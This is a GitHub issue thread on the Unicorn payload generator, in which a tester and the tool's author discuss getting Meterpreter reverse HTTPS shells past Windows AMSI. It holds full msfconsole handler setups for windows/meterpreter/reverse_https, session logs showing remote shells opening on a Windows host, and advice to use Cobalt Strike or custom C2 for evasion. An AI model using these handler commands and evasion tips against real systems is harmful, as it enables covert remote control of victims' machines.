Closed myexploit closed 5 years ago
Thanks! This is expected because if you load stdapi as part of the initial stager, in my testing it would kill the shell. The problem is there are a lot of hardcoded things inside of MSF and unfortunately it's a cat/mouse game on that front. While Unicorn bypasses AMSI - the shellcode loaders in MSF are problematic. Custom C2 would be fine, or Cobalt Strike as an example.
That makes sense, I will try CS tomorrow. Cheers for the quick reply.
Nice work on the update by the way, AMSI seems to spot the "PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443" example but I’m getting shells, and that keeps me happy.
I have spotted that if you include AutoLoadStdapi false in your MSF handler script as is now included in unicorn.rc you don’t seem to be able to use most of Meterpreter functions.
I just spotted it while testing the update.
Below is my testing:
```
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set LHOST 192.168.1.29
LHOST => 192.168.1.29
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > set AutoVerifySession false
AutoVerifySession => false
msf5 exploit(multi/handler) > set AutoSystemInfo false
AutoSystemInfo => false
msf5 exploit(multi/handler) > set AutoLoadStdapi false
AutoLoadStdapi => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) > [*] Started HTTPS reverse handler on https://192.168.1.29:443
[*] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: 7uxscvzs) Attaching orphaned/stageless session...
msf5 exploit(multi/handler) > [*] Meterpreter session 1 opened (192.168.1.29:443 -> 192.168.1.28:49215) at 2019-05-16 17:06:44 +0100
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > [*] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: 7uxscvzs) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (192.168.1.29:443 -> 192.168.1.28:49216) at 2019-05-16 17:06:45 +0100
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > shell
[-] Unknown command: shell.
meterpreter > background
```
Retrying without the "set AutoLoadStdapi false" option:
```
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set LHOST 192.168.1.29
LHOST => 192.168.1.29
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) > [*] Started HTTPS reverse handler on https://192.168.1.29:443
[*] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: lbheaqqo) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.168.1.29:443 -> 192.168.1.28:49238) at 2019-05-16 17:08:01 +0100
[*] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: lbheaqqo) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (192.168.1.29:443 -> 192.168.1.28:49239) at 2019-05-16 17:08:03 +0100
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3948 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
```